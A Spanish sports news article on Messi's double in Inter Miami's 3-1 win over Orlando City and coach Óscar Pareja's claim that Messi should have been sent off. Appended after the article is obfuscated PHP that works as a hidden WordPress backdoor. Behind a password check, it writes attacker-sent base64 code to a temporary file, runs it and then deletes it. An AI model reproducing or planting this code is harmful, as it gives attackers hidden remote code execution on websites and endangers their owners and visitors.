Lío de Messi en Miami: “Debió ser expulsado”

Óscar Pareja, entrenador de Orlando City, dijo tras el partido vs. Inter Miami que el astro argentino debía haber visto la segunda amarilla por un empujón brusco.

Actuación magistral de Messi con polémica incluida en la gran victoria de Inter Miami en el Clásico del Sol. El equipo dirigido por el Tata Martino venció por 3-1 ante sus rivales y vecinos de estado, Orlando City, en un partido notable de Messi en el que sumó un nuevo doblete.

Messi se mostró muy activo e implicado en el juego. De hecho, el argentino tuvo una serie de encontronazos con varios rivales, algo que no habitúa a ocurrirle a un jugador cuya calma dentro del terreno de juego le precede. Leo tuvo roces con el uruguayo Araújo y el peruano Cartagena, esta segunda de hecho, fue merecedora de tarjeta amarilla.

Sin importarle la polémica o lo caliente del partido, Messi tuvo además ocasión de asestar un doblete esencial para la victoria de Inter Miami. El argentino tardó tan solo 7 minutos en perforar la meta defendida por Gallese, la primera vez que lo consigue en los 4 duelos que ha jugado contra el meta peruano.

El segundo tanto de Messi fue el de la tranquilidad para Inter Miami. El astro argentino definió a la perfección tras la asistencia del que es uno de sus mejores socios desde su llegada al fútbol estadounidense. Tras este nuevo registro, Messi acumula un total de 5 goles en sus primeros 3 partidos en el club de Florida, una cifra que hace comprender la dimensión del talento de uno de los mejores de todos los tiempos.

Lejos de la brillante actuación de Messi, hubo una acción trascendental al filo del descanso que ha avivado la polémica. Ya en el descuento, Messi cargó con su brazo de forma exagerada a César Araújo, una acción que provocó la petición de expulsión por doble amarilla desde el banquillo de OrlandoMessi había sido amonestado en el minuto 21 por una patada a destiempo.

El DT de Orlando estalla

Óscar Pareja, entrenador colombiano de Orlando City, en la conferencia de prensa posterior al partido no quiso obviar la polémica y dejó varias declaraciones reseñables que insinúan cierto favoritismo de los árbitros hacía Leo Messi: “A lo mejor el aficionado raso no le pone atención, pero había una doble amarilla también a Leo, no me importa que sea él, tiene que ser medido igual”.

“Lo que pasó hoy en la cancha no fue justo, entonces nos vamos frustrados. Nos vamos con la derrota, pero hay que decir las cosas como son: no podemos dejar lo que pasó debajo de un mueble”, dijo Pareja acerca de las decisiones arbitrales que en su consideración, pudieron llegar a condicionar el resultado.

AS

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}